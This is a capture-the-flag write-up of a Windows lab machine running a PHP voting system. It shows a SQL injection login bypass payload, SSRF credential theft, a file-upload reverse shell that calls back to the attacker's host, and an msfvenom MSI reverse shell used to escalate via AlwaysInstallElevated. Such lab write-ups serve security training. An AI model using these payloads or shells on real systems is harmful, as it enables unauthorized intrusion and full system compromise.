Recon
rustscan x nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
|
└─$ rustscan -b 10000 -a 10.10.10.239 -- -T5 -A -sV -Pn
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
443/tcp open ssl/http syn-ack Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
445/tcp open microsoft-ds syn-ack Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql? syn-ack
|_ Host '10.10.16.11' is not allowed to connect to this MariaDB server
| mysql-info:
|_ MySQL Error: Host '10.10.16.11' is not allowed to connect to this MariaDB server
5000/tcp open http syn-ack Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
5040/tcp open unknown syn-ack
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp open pando-pub? syn-ack
47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49665/tcp open msrpc syn-ack Microsoft Windows RPC
49666/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49668/tcp open msrpc syn-ack Microsoft Windows RPC
49669/tcp open msrpc syn-ack Microsoft Windows RPC
49670/tcp open msrpc syn-ack Microsoft Windows RPC
Host script results:
| smb-os-discovery:
| OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: Love
| NetBIOS computer name: LOVE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-09-05T13:06:02-07:00
|
The nmap scan provide us some informations about the machine. It is a Windows 10 Pro station.
We discover a MySQL server running on port 5000 but we don’t have an access to it. It is IP filtered.
1
2
|
└─$ mysql --host=10.10.10.239
ERROR 1130 (HY000): Host '10.10.16.11' is not allowed to connect to this MariaDB server
|
We got a http server on port 80 and several other ports. We can see on the http-title get from the scan that the website use a Voting System.
Browsing to http://10.10.10.239/index.php, we are face to a login form.
Index page with the login form
dirbuster
Using dirbuster we discover some directory and an interesting admin login page at http://10.10.10.239/admin/index.php.
Vulnerabilities
searchsploit
Running searchsploit we found multiple vulnerabilities on the Voting System.
1
2
3
4
5
6
7
8
9
|
└─$ searchsploit voting system
----------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------- ---------------------------------
Voting System 1.0 - Authentication Bypass (SQLI) | php/webapps/49843.txt
Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution) | php/webapps/49445.py
Voting System 1.0 - Remote Code Execution (Unauthenticated) | php/webapps/49846.txt
Voting System 1.0 - Time based SQLI (Unauthenticated SQL injection) | php/webapps/49817.txt
----------------------------------------------------------------------------------- ---------------------------------
|
First, we will focus on the Authentication Bypass (SQLI). To try to bypass the login form on the admin page.
Exploiting Voting System
First solution - SSRF
On the nmap scan we discover a certificate on port 443.
We can extract from it two domains:
- love.htb
- staging.love.htb
Subject name of the certificate containing 2 domains
1
2
|
# put both domain on /etc/hosts
echo "10.10.10.239 love.htb staging.love.htb" > /etc/hosts
|
Browsing on http://staging.love.htb we are face to a file scanner service. We found a demo page where we can provide url that point to file.
URL File scanner
Do you remember the MySQL filtered service ? Maybe we can get some information from that service.
Exploiting SSRF on the scanner service
We get our creds admin:@LoveIsInTheAir!!!! !
Second solution - SQL injection
This exploit use an Union Base SQLi to bypass authentication.
We need to provide a bcrypt hash and a non-existing user
1
|
login=&password=admin&username=coucou' UNION SELECT 1,2,"$2y$10$913MFiqWEjfzJ0fZc74hQeRdPGOdggX7KFbd23rfPyf5zmnISBC3a",4,5,6,7 from INFORMATION_SCHEMA.SCHEMATA;-- -
|
With burp, I craft this payload and I try the SQLi:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
POST /admin/login.php HTTP/1.1
Host: 10.10.10.239
Content-Length: 194
Cache-Control: max-age=
Upgrade-Insecure-Requests: 1
Origin: http://10.10.10.239
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.10.10.239/admin/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=sv9dcm0k1bv1gl1q2nhq5db1e0
Connection: close
username=coucou%27+UNION+SELECT+1%2C2%2C%22%242y%2412%24jRwyQyXnktvFrlryHNEhXOeKQYX7%2F5VK2ZdfB9f%2FGcJLuPahJWZ9K%22%2C4%2C5%2C6%2C7+from+INFORMATION_SCHEMA.SCHEMATA%3B--+-&password=admin&login=
|
It works! We are now connected to the Dashboard as Neovic Devierte (admin).
Voting System Dahsboard
Get our first shell
Now that we are connected we can use the File Upload RCE (Authenticated Remote Code Execution) exploit found with searchsploit.
The exploit is a python script. This one will upload a php script throught the profile photo upload feature. Our script will spawn a reverse shell.
We edit the script to fit our needs.
1
2
3
4
5
6
7
8
9
10
11
12
|
# --- Edit your settings here ----
IP = "10.10.10.239" # Website's URL
USERNAME = "admin" # Auth User
PASSWORD = "@LoveIsInTheAir!!!!" # Auth Password
REV_IP = "10.10.16.11" # Reverse shell IP
REV_PORT = "4444" # Reverse port
# --------------------------------
INDEX_PAGE = f"http://{IP}/admin/index.php"
LOGIN_URL = f"http://{IP}/admin/login.php"
VOTE_URL = f"http://{IP}/admin/voters_add.php"
CALL_SHELL = f"http://{IP}/images/shell.php"
|
After opening a listener with nc I execute the exploit.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
└─$ rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.16.11] from (UNKNOWN) [10.10.10.239] 54012
b374k shell : connected
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\omrs\images>whoami
whoami
love\phoebe
C:\xampp\htdocs\omrs\images>type C:\Users\Phoebe\Desktop\user.txt
*************************7feb616
|
We get a shell! We are now connected as love\phoebe, we can get the user flag.
Path to the privesc
Local recon
Search for any used ports, tasks or privileges.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
# show used ports
C:\xampp\htdocs\omrs\images> netstat -ano | findstr TCP
# search for tasks
C:\xampp\htdocs\omrs\images> tasklist /v
# show privileges
C:\xampp\htdocs\omrs\images>whoami /all
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
|
But I don’t find any interesting informations.
WinPeas
I launch a WinPeas scan and I found that the AlwaysInstallElevated privilege is enabled. It means that we are able to install & execute MSI package.
1
2
3
4
|
---------- Checking AlwaysInstallElevated
- https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated
AlwaysInstallElevated set to 1 in HKLM!
AlwaysInstallElevated set to 1 in HKCU!
|
Abusing privileges
It is possible to craft our MSI Package from msfvenom. Then, we upload the package on the target. Finally, we install & execute the package with the msiexec command.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
└─$ msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.16.11 lport=4445 -f msi > exploit.msi
# upload the MSI package on C:\Windows\Temp dir
C:\xampp\htdocs\omrs\images>msiexec /quiet /qn /i C:\Windows\Temp\exploit.msi
└─$ nc -lnvp 4445
listening on [any] 4445 ...
connect to [10.10.16.11] from (UNKNOWN) [10.10.10.239] 54112
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>
C:\Users\Administrator\Desktop>type root.txt
type root.txt
**************************43d68b
|
We are now system owner ! We can get the flag :)
Easy, Internal, Apache, Penetration Tester Level 1, SSRF Exploitation, A05:2021-Security Misconfiguration, Public Vulnerabilities, MySQL, Unrestricted File Upload, Windows Vulnerabilities, Remote Code Execution, Confidentiality, Code Execution, Defense Mechanisms
